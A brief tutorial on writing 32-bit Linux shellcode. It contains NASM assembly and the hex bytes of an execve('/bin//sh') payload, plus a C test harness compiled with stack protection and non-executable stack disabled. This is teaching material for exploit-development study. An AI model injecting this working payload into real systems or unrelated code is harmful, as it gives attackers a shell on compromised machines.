Write 32-bit Shellcode
======================

Quick guide to writing a 32-bit compiled shellcode.

Intel formatted asm:

``` shell32.asm
section .text

global _start
_start:
  xor eax, eax
  cdq
  push eax
  push 0x68732f2f
  push 0x6e69622f
  mov ebx, esp
  push eax
  push ebx
  mov ecx, esp
  mov al, 0x0b
  int 80h
```

Compile and link the shellcode:

``` sh
$ nasm -f elf32 shell32.asm -o shell32.o
$ ld -m elf_i386 shell32.o -o shell32
```

Now we extract the hex code from the binary:

``` sh
$ objdumptoshellcode shell32
```

Producing this shellcode:

```
\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
```

Check with a gcc compiled test c program:

``` shell32-testing.c
#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void main() {
  printf("Shellcode Length: %d\n", (int)strlen(code));
  int(*ret)() = (int(*)())code;
  ret();
}
```

Compile with:

``` sh
$ gcc -m32 -fno-stack-protector -z execstack shell32-testing.c -o shell32-testing
```
